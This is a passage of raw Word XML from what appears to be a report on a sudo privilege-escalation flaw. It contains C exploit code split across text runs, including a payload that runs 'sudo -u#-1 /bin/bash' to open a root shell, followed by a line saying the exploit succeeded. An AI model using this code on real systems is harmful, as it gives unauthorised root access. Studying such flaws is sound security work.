      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strcmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>buffer_try_exploit,"root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>")=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E796E9B"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printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>("\033[32m[\033[34m+\033[32m] Check Exploit [OK]\n"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="73950A12" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="37B0459B" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006B28E6" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>else{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A0CAE03" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"\033[31m[!] Check Exploit [FAILED]\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437C743F" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-1;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18845AFC" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A33949" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D960CA" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6662F2DB" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0BB4B7" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>payload(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4520C5AB"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printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>("\033[32m[\033[34m+\033[32m] Injecting Payload...\n"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="154C0E43"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printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">("\033[32m[\033[34m+\033[32m] Payload </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Injected !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CBCB5A"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printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">("\033[32m[\033[34m+\033[32m] Shell with root </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>opened !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2244F937" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u#-1 /bin/bash"); // -1 = root </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B196B54" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29373FC5" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479642A1" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A870110" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>print_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5840B633" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>check_sudo_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) ==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459AB83D" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) ==0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9AE3B6" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E9801" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>payload(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BA44DE" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F0BEB5" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>else{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="32D0F93A" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F5E6E3" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A74A84" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE25855" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F639F6C" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A88AFE" w14:textId="77777777" w:rsidR="00726945" w:rsidRDefault="00726945" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC7831A" w14:textId="028A93C2" w:rsidR="00726945" w:rsidRDefault="002D2B91" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:id w:val="1047108675"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Una19 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="002D2B91">
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="704564D9" w14:textId="77777777" w:rsidR="00726945" w:rsidRDefault="00726945" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362CC80E" w14:textId="77777777" w:rsidR="00726945" w:rsidRDefault="00726945" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75BD85E6" w14:textId="77777777" w:rsidR="00726945" w:rsidRDefault="00726945" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2D4AEF" w14:textId="77777777" w:rsidR="00726945" w:rsidRDefault="00726945" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="500E5A4F" w14:textId="77777777" w:rsidR="00726945" w:rsidRDefault="00726945" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39BEB979" w14:textId="77777777" w:rsidR="00726945" w:rsidRDefault="00726945" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC64AFD" w14:textId="77777777" w:rsidR="00726945" w:rsidRDefault="00726945" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE7FDAD" w14:textId="4137999C" w:rsidR="00647322" w:rsidRPr="002D2B91" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="002D2B91">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">After compiling that code You can get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D2B91">
        <w:t>out put</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D2B91">
        <w:t xml:space="preserve"> like this, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D2B91">
        <w:t>you  can</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002D2B91">
        <w:t xml:space="preserve"> see that program exploited successfully without affected any error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0CDD60" w14:textId="1CB6B781" w:rsidR="00726945" w:rsidRPr="00726945" w:rsidRDefault="00726945" w:rsidP="00647322">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28AA96AC" wp14:editId="04A861C9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1882140</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>193040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1882140" cy="1143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1882140" cy="1143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7841" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:148.2pt;margin-top:15.2pt;width:148.2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" fillcolor="#5a5a5a [2109]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFBB108" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="260BB337" wp14:editId="29E70F76">
            <wp:extent cx="572262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88069EA" w14:textId="77777777" w:rsidR="002D2B91" w:rsidRDefault="002D2B91" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9A1322" w14:textId="77777777" w:rsidR="002D2B91" w:rsidRDefault="002D2B91" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A24FDD" w14:textId="77777777" w:rsidR="002D2B91" w:rsidRDefault="002D2B91" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
